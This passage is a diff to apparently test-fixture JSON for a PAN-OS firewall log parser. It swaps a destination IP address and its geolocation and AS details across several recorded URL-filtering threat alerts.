"1:/tG+YfZ8qFKrUDfQ7EThCBXci9Y=", + "community_id": "1:euxf4A6kWeWGJu6MuGDs2l85ugI=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -2706,14 +2690,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545457130Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079095Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:51,25306,1,59281,80,0,0,0x208000,tcp,alert,\"antivirus-remote.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2736,26 +2720,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2771,7 +2754,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -2813,7 +2796,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Vfi4CxQayypb3DoxclNfeNjXdjo=", + "community_id": "1:SdTb469tRCABgoEEDDEw1DSQQHs=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -2850,14 +2833,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545464519Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079100900Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:49,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24561,1,59282,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.cfg\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -2880,26 +2863,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -2915,7 +2897,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -2957,7 +2939,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2UbFMV1DsXMB0b/AUotNCCsHm0s=", + "community_id": "1:77gDm3uChN5sMPF96tsLJjK6Bc4=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -2994,14 +2976,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545471606Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079106700Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,15099,1,59290,80,0,0,0x208000,tcp,alert,\"blogsexnakedgirlxxx.com/\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -3024,26 +3006,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3059,7 +3040,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3101,7 +3082,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:M8DHGZjrHyuCRpC9MNNfDUke5g4=", + "community_id": "1:MRL6gXI2+bPHjOwl6jUcT9qzDE4=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -3138,14 +3119,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545478662Z", - "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079112600Z", + "original": "Oct 30 09:46:32 1,2012/10/30 09:46:32,01606001116,THREAT,url,1,2012/04/10 04:39:50,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:52,24955,1,59286,80,0,0,0x208000,tcp,alert,\"bklinkov.ru/hi/start.exe\",(9999),not-resolved,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:32.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -3168,26 +3149,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3203,7 +3183,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3245,7 +3225,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:AVMiOufq2owuhWpcu/TfRJ38tv4=", + "community_id": "1:g+OW2rFxOQFbjQiQ/fw145Cfric=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -3282,14 +3262,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545485862Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079116800Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25398,1,59275,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -3312,26 +3292,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3347,7 +3326,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3389,7 +3368,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:/+Opb16c1ye6uLeu1/TNC+SGnYs=", + "community_id": "1:6PzwuKfF+39cTFyZytdFAhD4w44=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -3426,14 +3405,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545493261Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079121900Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,25945,1,59277,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -3456,26 +3435,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3491,7 +3469,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3533,7 +3511,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:uslltTePy/m8Gxhk/MgPbZfk6Rg=", + "community_id": "1:vRVo2Gp1oNRBcvj5NtWtblslqFk=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -3570,14 +3548,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545504361Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079127Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:47,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:49,27111,1,59276,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -3600,26 +3578,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3635,7 +3612,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3677,7 +3654,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:WiUImNtgjkeNDi1Qigg7+Y6pDAg=", + "community_id": "1:06OCvk6jDtgpNZu7X72+H8dLeQ8=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -3714,14 +3691,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545512097Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079134700Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,25871,1,59278,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -3744,26 +3721,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3779,7 +3755,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3821,7 +3797,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:FmIwID3HJ4Q0574SjlhMHApz/Hs=", + "community_id": "1:zCXr7ZHueb4XQvihT/RtgRKe8VI=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -3858,14 +3834,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545519286Z", - "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079138700Z", + "original": "Oct 30 09:46:37 1,2012/10/30 09:46:37,01606001116,THREAT,url,1,2012/04/10 04:39:48,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:50,26251,1,59279,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:37.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -3888,26 +3864,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, - "ip": "204.232.231.46" + "ip": "175.16.199.1" }, "rule": { "name": "rule1" @@ -3923,7 +3898,7 @@ }, "ip": "192.168.0.2" }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "panw": { "panos": { "ruleset": "rule1", @@ -3965,7 +3940,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:6AuZBrHKsUJjLNgm/mJ5QToaPo8=", + "community_id": "1:1lzsBSPnoPJeEUEveEgV+jZ1xOA=", "transport": "tcp", "application": "web-browsing", "direction": "inbound" @@ -4002,14 +3977,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "severity": 5, - "ingested": "2021-09-08T12:37:05.545526614Z", - "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", + "ingested": "2021-12-09T13:42:59.079143600Z", + "original": "Oct 30 09:46:42 1,2012/10/30 09:46:42,01606001116,THREAT,url,1,2012/04/10 04:39:45,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:47,24816,1,59271,80,0,0,0x208000,tcp,alert,\"-/\",(9999),private-ip-addresses,informational,client-to-server,0,0x0,192.168.0.0-192.168.255.255,United States,0,text/html", "created": "2012-10-30T09:46:42.000-04:00", "timezone": "America/New_York", "kind": "alert", @@ -4032,26 +4007,25 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + 